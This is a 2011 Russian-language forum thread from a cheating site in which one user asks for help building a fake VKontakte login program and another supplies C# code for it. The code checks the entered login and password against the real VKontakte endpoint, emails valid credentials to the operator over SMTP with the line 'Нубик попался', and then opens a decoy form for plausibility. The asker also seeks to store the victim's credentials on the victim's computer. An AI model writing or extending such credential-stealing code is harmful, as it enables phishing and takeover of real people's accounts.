Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Помогите с С#

-

Школа Читера

- Основы основ - начинаем писать статьи для начинающих с целью создания полноценного раздела

Ответ
 
Опции темы
Старый 08.04.2011, 20:50   #1
 Разведчик
Аватар для Mensons
 
Mensons никому не известный тип
Регистрация: 08.04.2011
Сообщений: 0
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Помогите с С#

Решил сделать фейка. Помогите как сделать так, что бы:
1) Вот по этому коду:
Код:
   //создаем запрос
            HttpWebRequest wrGETURL = (HttpWebRequest)System.Net.WebRequest.Create("http://vkontakte.ru/login.php?m=1&email=" + textBox1.Text + "&pass=" + textBox2.Text);
            //выставляем значения Headers
            //Запрещаем редирект
            wrGETURL.AllowAutoRedirect = false;
            //Выставляем таймаут
            wrGETURL.Timeout = 100000;
            //получаем Headers,пришедшие в ответе
            string headers = wrGETURL.GetResponse().Headers.ToString();
            //получаем весь ответ
            HttpWebResponse myHttpWebResponse = (HttpWebResponse)wrGETURL.GetResponse();
            //записываем ответ в поток
            StreamReader myStreamReadermy = new StreamReader(myHttpWebResponse.GetResponseStream(), Encoding.GetEncoding(1251));
            //запихиваем ответ в строку
            string page = myStreamReadermy.ReadToEnd();
            //это регулярное выражение,которое выдирает из переменной headers(а ее мы получили выше) значение sid
            Regex sidregex = new Regex("sid=([a-z0-9]+); exp");
            Match ssid = sidregex.Match(headers);
            sid = ssid.Groups[1].Value;
            //инициализируем куки
            cook = new Cookie("remixsid", sid);
            //тоже самое,куки пишем
            cook.Domain = "vkontakte.ru";
            //проверяем,получили ли мы нужную переменную в куки
            if (String.IsNullOrEmpty(sid))
                MessageBox.Show("Чето не получается авторизироваться");
            else
                MessageBox.Show("Успешно авторизировались");
Сделать так, что бы на почту шли данные только в том случае если человек удачно авторизировался, а если нет, то не шлёт на почту данные.
2) Создать конфиг файл на компе у жертвы, что бы там сохранялся логин и пароль и при повторном открытии фейка логин и пароль уже были введены. И с помощью этого файла сделать так, что бы когда он будет заходить в программу второй раз мне его данные уже не приходили.
3) Для правдоподобности как сделать так, что бы когда человек проходил авторизацию, то во фром2 открывалась статистика тюряги. Типа там авторитет ну и всё остальное?

Очень прошу помощи=)
  Ответить с цитированием
Старый 09.04.2011, 02:33   #2
Читер-спонсор
 Рыцарь-защитник
Аватар для Hermein
 
Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(
Регистрация: 14.01.2011
Сообщений: 633
Популярность: 28087
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 90
Поблагодарили 717 раз(а) в 374 сообщениях
Отправить сообщение для Hermein с помощью ICQ Отправить сообщение для Hermein с помощью Skype™
 
По умолчанию Re: Помогите с С#

Цитата:
Сообщение от MensonsПосмотреть сообщение
Решил сделать фейка. Помогите как сделать так, что бы:
1) Вот по этому коду:
Код:
   //создаем запрос
            HttpWebRequest wrGETURL = (HttpWebRequest)System.Net.WebRequest.Create("http://vkontakte.ru/login.php?m=1&email=" + textBox1.Text + "&pass=" + textBox2.Text);
            //выставляем значения Headers
            //Запрещаем редирект
            wrGETURL.AllowAutoRedirect = false;
            //Выставляем таймаут
            wrGETURL.Timeout = 100000;
            //получаем Headers,пришедшие в ответе
            string headers = wrGETURL.GetResponse().Headers.ToString();
            //получаем весь ответ
            HttpWebResponse myHttpWebResponse = (HttpWebResponse)wrGETURL.GetResponse();
            //записываем ответ в поток
            StreamReader myStreamReadermy = new StreamReader(myHttpWebResponse.GetResponseStream(), Encoding.GetEncoding(1251));
            //запихиваем ответ в строку
            string page = myStreamReadermy.ReadToEnd();
            //это регулярное выражение,которое выдирает из переменной headers(а ее мы получили выше) значение sid
            Regex sidregex = new Regex("sid=([a-z0-9]+); exp");
            Match ssid = sidregex.Match(headers);
            sid = ssid.Groups[1].Value;
            //инициализируем куки
            cook = new Cookie("remixsid", sid);
            //тоже самое,куки пишем
            cook.Domain = "vkontakte.ru";
            //проверяем,получили ли мы нужную переменную в куки
            if (String.IsNullOrEmpty(sid))
                MessageBox.Show("Чето не получается авторизироваться");
            else
                MessageBox.Show("Успешно авторизировались");
Сделать так, что бы на почту шли данные только в том случае если человек удачно авторизировался, а если нет, то не шлёт на почту данные.
2) Создать конфиг файл на компе у жертвы, что бы там сохранялся логин и пароль и при повторном открытии фейка логин и пароль уже были введены. И с помощью этого файла сделать так, что бы когда он будет заходить в программу второй раз мне его данные уже не приходили.
3) Для правдоподобности как сделать так, что бы когда человек проходил авторизацию, то во фром2 открывалась статистика тюряги. Типа там авторитет ну и всё остальное?

Очень прошу помощи=)

Ты ну очень многого просишь! Там не 1 сотня строк кода получится, фактически ты проси написать тебе всю программу!
а насчет в случае успешной авторизации вот:
Код:
else{
                MessageBox.Show("Успешно авторизировались")
SmtpClient client = new SmtpClient("smtp.rambler.ru", 25); // Здесь указываем смтп сервер и порт, который мы будем использовать
                    client.Credentials = new System.Net.NetworkCredential("login", "pass"); // Указываем логин и пароль для авторизации(от кого письмо)

                    string msgFrom = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, от кого письмо
                    string msgTo = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, кому письмо будет отправлено
                    string msgSubject = "Письмо из c#"; // Указываем тему пиьсма

                    string msgBody = String.Format("Нубик попался :-)\n\nLogin: {0}\nPass:{1}",
                    textBox1.Text.ToString().textBox2.Text); // Тут мы формируем тело письма, передаем выбранный сервер, логин и пароль.

                    MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody); // Создаем письмо, из всего, что сделали выше

                    try
                    {client.Send(msg); // Отправляем письмо}
                    catch { }

Form2 f2 = new Form2();
this.Hide();//Скрываем текущую форму
f2.Show();//открываем новую форму
}
  Ответить с цитированием
Старый 09.04.2011, 09:40   #3
 Разведчик
Аватар для Mensons
 
Mensons никому не известный тип
Регистрация: 08.04.2011
Сообщений: 0
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Помогите с С#

Ну и нафига ты мне даешь код, что бы просто отправить письмо? Я просил, что бы письмо отправлялось только в том случае если авторизировались... Просто так отправить письмо мне не надо такой код я и так знаю...
При том код дал, что побарабану автаризировался или нет он вторую форму открывает... Я уже сделал, что бы открывал только при случае авторизации мне вторую форму открывал.... Вообщем код который ты дал он тут не к месту...
Ты помоему вообще не читал мою просьбу....
  Ответить с цитированием
Старый 13.04.2011, 15:00   #4
Читер-спонсор
 Рыцарь-защитник
Аватар для Hermein
 
Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(Hermein сломал счётчик популярности :(
Регистрация: 14.01.2011
Сообщений: 633
Популярность: 28087
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 90
Поблагодарили 717 раз(а) в 374 сообщениях
Отправить сообщение для Hermein с помощью ICQ Отправить сообщение для Hermein с помощью Skype™
 
По умолчанию Re: Помогите с С#

Цитата:
Сообщение от MensonsПосмотреть сообщение
Ну и нафига ты мне даешь код, что бы просто отправить письмо? Я просил, что бы письмо отправлялось только в том случае если авторизировались... Просто так отправить письмо мне не надо такой код я и так знаю...
При том код дал, что побарабану автаризировался или нет он вторую форму открывает... Я уже сделал, что бы открывал только при случае авторизации мне вторую форму открывал.... Вообщем код который ты дал он тут не к месту...
Ты помоему вообще не читал мою просьбу....

Если ты нуб, я не виноват - ты внимательно смотри для начала!
else {//успешно авторизовались, отправляем на почту }
Что здесь непонятно? если такой трудный сейчас весь код целиком дам:

Код:
HttpWebRequest wrGETURL = (HttpWebRequest)System.Net.WebRequest.Create("http://vkontakte.ru/login.php?m=1&email=" + textBox1.Text + "&pass=" + textBox2.Text);
             wrGETURL.AllowAutoRedirect = false;
             wrGETURL.Timeout = 100000;
             string headers = wrGETURL.GetResponse().Headers.ToString();
             HttpWebResponse myHttpWebResponse = (HttpWebResponse)wrGETURL.GetResponse();
             StreamReader myStreamReadermy = new StreamReader(myHttpWebResponse.GetResponseStream(), Encoding.GetEncoding(1251));
             string page = myStreamReadermy.ReadToEnd();
             Regex sidregex = new Regex("sid=([a-z0-9]+); exp");
             Match ssid = sidregex.Match(headers);
             sid = ssid.Groups[1].Value;
             cook = new Cookie("remixsid", sid);
             cook.Domain = "vkontakte.ru";
             if (String.IsNullOrEmpty(sid))
{MessageBox.Show("Чето не получается авторизироваться");}
            else{
MessageBox.Show("Успешно авторизировались");
SmtpClient client = new SmtpClient("smtp.rambler.ru", 25); // Здесь указываем смтп сервер и порт, который мы будем использовать
                    client.Credentials = new System.Net.NetworkCredential("login", "pass"); // Указываем логин и пароль для авторизации(от кого письмо)
                    string msgFrom = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, от кого письмо
                    string msgTo = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, кому письмо будет отправлено
                    string msgSubject = "Письмо из c#"; // Указываем тему пиьсма
                    string msgBody = String.Format("Нубик попался :-)\n\nLogin: {0}\nPass:{1}",
                    textBox1.Text.ToString(),textBox2.Text); // Тут мы формируем тело письма, передаем выбранный сервер, логин и пароль.
                    MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody); // Создаем письмо, из всего, что сделали выше

                    try
                    {client.Send(msg); // Отправляем письмо}
                    catch { }

Form2 f2 = new Form2();
this.Hide();//Скрываем текущую форму
f2.Show();//открываем новую форму
}
Надеюсь теперь понятно?!

А вот сохранение файла настроек : Тыц

Хотя можно и без файлов это делать! Сохранять в самой программе 4 строчки кода всего

Последний раз редактировалось Hermein; 13.04.2011 в 15:20.
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:20.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net